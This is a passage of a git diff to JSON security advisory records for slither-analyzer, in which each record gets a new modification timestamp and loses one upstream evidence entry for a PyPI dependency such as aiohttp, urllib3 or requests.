"key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2023-49081.json b/advisories/BREW-slither-analyzer-CVE-2023-49081.json index 37a48f08e0..2b64856afa 100644 --- a/advisories/BREW-slither-analyzer-CVE-2023-49081.json +++ b/advisories/BREW-slither-analyzer-CVE-2023-49081.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2023-49081", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-q3qx-c6g2-7pw2", "CVE-2023-49081", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2023-49082.json b/advisories/BREW-slither-analyzer-CVE-2023-49082.json index 5123f624c0..f794ca4d90 100644 --- a/advisories/BREW-slither-analyzer-CVE-2023-49082.json +++ b/advisories/BREW-slither-analyzer-CVE-2023-49082.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2023-49082", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-qvrw-v9rv-5rjx", "CVE-2023-49082", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2023-52323.json b/advisories/BREW-slither-analyzer-CVE-2023-52323.json index 49e9f3ee48..bc859fcaea 100644 --- a/advisories/BREW-slither-analyzer-CVE-2023-52323.json +++ b/advisories/BREW-slither-analyzer-CVE-2023-52323.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2023-52323", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-j225-cvw7-qrx7", "CVE-2023-52323", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pycryptodome", - "subject_version": "3.23.0", - "key": "pkg:pypi/pycryptodome@3.23.0", - "resource": "pycryptodome" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2024-23334.json b/advisories/BREW-slither-analyzer-CVE-2024-23334.json index cde0748770..18563583fc 100644 --- a/advisories/BREW-slither-analyzer-CVE-2024-23334.json +++ b/advisories/BREW-slither-analyzer-CVE-2024-23334.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2024-23334", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-5h86-8mv2-jq9f", "CVE-2024-23334", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2024-23829.json b/advisories/BREW-slither-analyzer-CVE-2024-23829.json index 3544d9fba9..b53e000527 100644 --- a/advisories/BREW-slither-analyzer-CVE-2024-23829.json +++ b/advisories/BREW-slither-analyzer-CVE-2024-23829.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2024-23829", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-8qpw-xqxj-h4r2", "CVE-2024-23829", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2024-26134.json b/advisories/BREW-slither-analyzer-CVE-2024-26134.json index 43ac2daf52..b599e9eff7 100644 --- a/advisories/BREW-slither-analyzer-CVE-2024-26134.json +++ b/advisories/BREW-slither-analyzer-CVE-2024-26134.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2024-26134", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-375g-39jq-vq7m", "CVE-2024-26134", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "cbor2", - "subject_version": "6.1.3", - "key": "pkg:pypi/cbor2@6.1.3", - "resource": "cbor2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2024-27306.json b/advisories/BREW-slither-analyzer-CVE-2024-27306.json index d16daa38ae..392d074d8b 100644 --- a/advisories/BREW-slither-analyzer-CVE-2024-27306.json +++ b/advisories/BREW-slither-analyzer-CVE-2024-27306.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2024-27306", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-7gpw-8wmc-pm8g", "CVE-2024-27306", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2024-30251.json b/advisories/BREW-slither-analyzer-CVE-2024-30251.json index 50674f4e6f..2f170638b5 100644 --- a/advisories/BREW-slither-analyzer-CVE-2024-30251.json +++ b/advisories/BREW-slither-analyzer-CVE-2024-30251.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2024-30251", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-5m98-qgg9-wh84", "CVE-2024-30251", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2024-35195.json b/advisories/BREW-slither-analyzer-CVE-2024-35195.json index 0a6ea878e4..c00c2dacf0 100644 --- a/advisories/BREW-slither-analyzer-CVE-2024-35195.json +++ b/advisories/BREW-slither-analyzer-CVE-2024-35195.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2024-35195", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-9wx4-h78v-vm56", "CVE-2024-35195", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2024-3651.json b/advisories/BREW-slither-analyzer-CVE-2024-3651.json index 50105cd920..2adee2177f 100644 --- a/advisories/BREW-slither-analyzer-CVE-2024-3651.json +++ b/advisories/BREW-slither-analyzer-CVE-2024-3651.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2024-3651", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-jjg7-2v4v-x38h", "CVE-2024-3651", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", - "resource": "idna" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2024-37891.json b/advisories/BREW-slither-analyzer-CVE-2024-37891.json index 8faab8fc47..db5e688af2 100644 --- a/advisories/BREW-slither-analyzer-CVE-2024-37891.json +++ b/advisories/BREW-slither-analyzer-CVE-2024-37891.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2024-37891", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-34jh-p97f-mpxf", "CVE-2024-37891", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2024-42367.json b/advisories/BREW-slither-analyzer-CVE-2024-42367.json index 8b40f7a988..1416d5e660 100644 --- a/advisories/BREW-slither-analyzer-CVE-2024-42367.json +++ b/advisories/BREW-slither-analyzer-CVE-2024-42367.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2024-42367", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-jwhx-xcg6-8xhj", "CVE-2024-42367", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2024-47081.json b/advisories/BREW-slither-analyzer-CVE-2024-47081.json index cf8205a0b9..86d8096552 100644 --- a/advisories/BREW-slither-analyzer-CVE-2024-47081.json +++ b/advisories/BREW-slither-analyzer-CVE-2024-47081.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2024-47081", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-9hjg-9r4m-mvj7", "CVE-2024-47081", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2024-52303.json b/advisories/BREW-slither-analyzer-CVE-2024-52303.json index f7ddd09f24..b49ed71335 100644 --- a/advisories/BREW-slither-analyzer-CVE-2024-52303.json +++ b/advisories/BREW-slither-analyzer-CVE-2024-52303.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2024-52303", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-27mf-ghqm-j3j8", "CVE-2024-52303", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2024-52304.json b/advisories/BREW-slither-analyzer-CVE-2024-52304.json index 83121f5ecb..2737ae776b 100644 --- a/advisories/BREW-slither-analyzer-CVE-2024-52304.json +++ b/advisories/BREW-slither-analyzer-CVE-2024-52304.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2024-52304", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-8495-4g3g-x7pr", "CVE-2024-52304", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2025-50181.json b/advisories/BREW-slither-analyzer-CVE-2025-50181.json index 2cd3477a47..2ae68a3a5a 100644 --- a/advisories/BREW-slither-analyzer-CVE-2025-50181.json +++ b/advisories/BREW-slither-analyzer-CVE-2025-50181.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2025-50181", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-pq67-6m6q-mj2v", "CVE-2025-50181", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2025-50182.json b/advisories/BREW-slither-analyzer-CVE-2025-50182.json index e60f69afc1..25ae27c860 100644 --- a/advisories/BREW-slither-analyzer-CVE-2025-50182.json +++ b/advisories/BREW-slither-analyzer-CVE-2025-50182.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2025-50182", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-48p4-8xcf-vxj5", "CVE-2025-50182", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2025-53643.json b/advisories/BREW-slither-analyzer-CVE-2025-53643.json index 833315b266..4b93d3dea7 100644 --- a/advisories/BREW-slither-analyzer-CVE-2025-53643.json +++ b/advisories/BREW-slither-analyzer-CVE-2025-53643.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2025-53643", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-9548-qrrj-x5pj", "CVE-2025-53643", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2025-64076.json b/advisories/BREW-slither-analyzer-CVE-2025-64076.json index 538dfecdd3..0331d8ff8f 100644 --- a/advisories/BREW-slither-analyzer-CVE-2025-64076.json +++ b/advisories/BREW-slither-analyzer-CVE-2025-64076.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2025-64076", "published": "2026-08-13T17:34:41Z", - "modified": "2026-09-02T09:56:29Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "PYSEC-2025-238", "CVE-2025-64076", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "cbor2", - "subject_version": "6.1.3", - "key": "pkg:pypi/cbor2@6.1.3", - "resource": "cbor2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2025-66418.json b/advisories/BREW-slither-analyzer-CVE-2025-66418.json index e454837ffd..19738ab8c5 100644 --- a/advisories/BREW-slither-analyzer-CVE-2025-66418.json +++ b/advisories/BREW-slither-analyzer-CVE-2025-66418.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2025-66418", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-gm62-xv2j-4w53", "CVE-2025-66418", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2025-66471.json b/advisories/BREW-slither-analyzer-CVE-2025-66471.json index d21b0ae08f..3041896b27 100644 --- a/advisories/BREW-slither-analyzer-CVE-2025-66471.json +++ b/advisories/BREW-slither-analyzer-CVE-2025-66471.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2025-66471", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-2xpw-w6gg-jr37", "CVE-2025-66471", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2025-68131.json b/advisories/BREW-slither-analyzer-CVE-2025-68131.json index d0ff386fb4..90cdf3ef2b 100644 --- a/advisories/BREW-slither-analyzer-CVE-2025-68131.json +++ b/advisories/BREW-slither-analyzer-CVE-2025-68131.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2025-68131", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-wcj4-jw5j-44wh", "CVE-2025-68131", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "cbor2", - "subject_version": "6.1.3", - "key": "pkg:pypi/cbor2@6.1.3", - "resource": "cbor2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2025-69223.json b/advisories/BREW-slither-analyzer-CVE-2025-69223.json index 6d2154d558..7568e454e9 100644 --- a/advisories/BREW-slither-analyzer-CVE-2025-69223.json +++ b/advisories/BREW-slither-analyzer-CVE-2025-69223.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2025-69223", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-6mq8-rvhq-8wgg", "CVE-2025-69223", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2025-69224.json b/advisories/BREW-slither-analyzer-CVE-2025-69224.json index 69a8aa57c7..7214091849 100644 --- a/advisories/BREW-slither-analyzer-CVE-2025-69224.json +++ b/advisories/BREW-slither-analyzer-CVE-2025-69224.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2025-69224", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-69f9-5gxw-wvc2", "CVE-2025-69224", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2025-69225.json b/advisories/BREW-slither-analyzer-CVE-2025-69225.json index c75a0b91fa..db7bbfbf98 100644 --- a/advisories/BREW-slither-analyzer-CVE-2025-69225.json +++ b/advisories/BREW-slither-analyzer-CVE-2025-69225.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2025-69225", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-mqqc-3gqh-h2x8", "CVE-2025-69225", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2025-69226.json b/advisories/BREW-slither-analyzer-CVE-2025-69226.json index 876416ae3e..de429c157b 100644 --- a/advisories/BREW-slither-analyzer-CVE-2025-69226.json +++ b/advisories/BREW-slither-analyzer-CVE-2025-69226.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2025-69226", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-54jq-c3m8-4m76", "CVE-2025-69226", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2025-69227.json b/advisories/BREW-slither-analyzer-CVE-2025-69227.json index 0a9f2d725b..924c86a98c 100644 --- a/advisories/BREW-slither-analyzer-CVE-2025-69227.json +++ b/advisories/BREW-slither-analyzer-CVE-2025-69227.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2025-69227", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-jj3x-wxrx-4x23", "CVE-2025-69227", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2025-69228.json b/advisories/BREW-slither-analyzer-CVE-2025-69228.json index 1f3618ff00..4bc5c0ceda 100644 --- a/advisories/BREW-slither-analyzer-CVE-2025-69228.json +++ b/advisories/BREW-slither-analyzer-CVE-2025-69228.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2025-69228", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-6jhg-hg63-jvvf", "CVE-2025-69228", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2025-69229.json b/advisories/BREW-slither-analyzer-CVE-2025-69229.json index ad5660ba4f..4282aa2df8 100644 --- a/advisories/BREW-slither-analyzer-CVE-2025-69229.json +++ b/advisories/BREW-slither-analyzer-CVE-2025-69229.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2025-69229", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-g84x-mcqj-x9qq", "CVE-2025-69229", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2025-69230.json b/advisories/BREW-slither-analyzer-CVE-2025-69230.json index 56a9aea4fc..3550aed1ac 100644 --- a/advisories/BREW-slither-analyzer-CVE-2025-69230.json +++ b/advisories/BREW-slither-analyzer-CVE-2025-69230.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2025-69230", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-fh55-r93g-j68g", "CVE-2025-69230", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2026-21441.json b/advisories/BREW-slither-analyzer-CVE-2026-21441.json index 8f898a755a..1591807835 100644 --- a/advisories/BREW-slither-analyzer-CVE-2026-21441.json +++ b/advisories/BREW-slither-analyzer-CVE-2026-21441.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2026-21441", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-38jv-5279-wg99", "CVE-2026-21441", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2026-22815.json b/advisories/BREW-slither-analyzer-CVE-2026-22815.json index 533803578b..df90503625 100644 --- a/advisories/BREW-slither-analyzer-CVE-2026-22815.json +++ b/advisories/BREW-slither-analyzer-CVE-2026-22815.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2026-22815", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-w2fm-2cpv-w7v5", "CVE-2026-22815", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-slither-analyzer-CVE-2026-25645.json b/advisories/BREW-slither-analyzer-CVE-2026-25645.json index 99c7a9049f..60cd30811c 100644 --- a/advisories/BREW-slither-analyzer-CVE-2026-25645.json +++ b/advisories/BREW-slither-analyzer-CVE-2026-25645.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-slither-analyzer-CVE-2026-25645", "published": "2026-08-13T17:34:41Z", - "modified": "2026-08-13T17:34:41Z", + "modified": "2026-09-10T20:54:13Z", "upstream": [ "GHSA-gc5v-m9x4-r6x2", "CVE-2026-25645", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - 